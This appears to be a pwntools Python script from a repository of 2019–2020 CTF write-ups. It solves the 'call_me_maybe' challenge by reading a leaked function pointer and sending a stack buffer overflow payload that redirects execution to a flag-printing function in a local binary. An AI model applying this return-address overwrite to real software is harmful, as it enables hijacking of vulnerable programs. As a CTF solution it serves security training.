write-ups-challenges-2019-2020/call_me_maybe/solve/pwn.py

15 lines
264 B
Python
Raw Normal View History

2022-11-24 21:43:03 +00:00
from pwn import *
offset = 32
r = process('../call_me_maybe')
stdout = r.recvuntil("Pointer to printflag is 0x")
addr = int(r.recvuntil("\n"), 16)
print("Pointer is %x" % addr)
exploit = "A"*offset + "B"*8 + p64(addr)
r.sendline(exploit)
print(r.recv())